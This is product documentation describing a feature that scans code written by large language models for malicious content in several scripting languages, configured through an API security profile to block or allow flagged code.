Malicious Code Detection scans LLM-generated code snippets across multiple languages
        to prevent security threats and supply chain attacks.
    Code snippets generated by Large Language Models (LLMs) can be protected
                with 
Malicious Code Detection feature for
                potential security threats. This feature is crucial for preventing supply chain
                attacks, enhancing application security, maintaining code integrity, and mitigating
                AI risks.
The system supports scanning for malicious code in multiple languages,
                including JavaScript, Python, VBScript, PowerShell, Batch, Shell, and Perl. 
To activate this protection, you need to enable it within the API Security
                Profile. When configured, this feature can block the execution of potentially
                malicious code or be set to allow, depending on your security needs. This capability
                is vital for organizations that are increasingly leveraging generative AI for
                development, as it helps to secure against the risks of LLM poisoning, where
                adversaries intentionally introduce malicious data into training datasets to
                manipulate model outputs.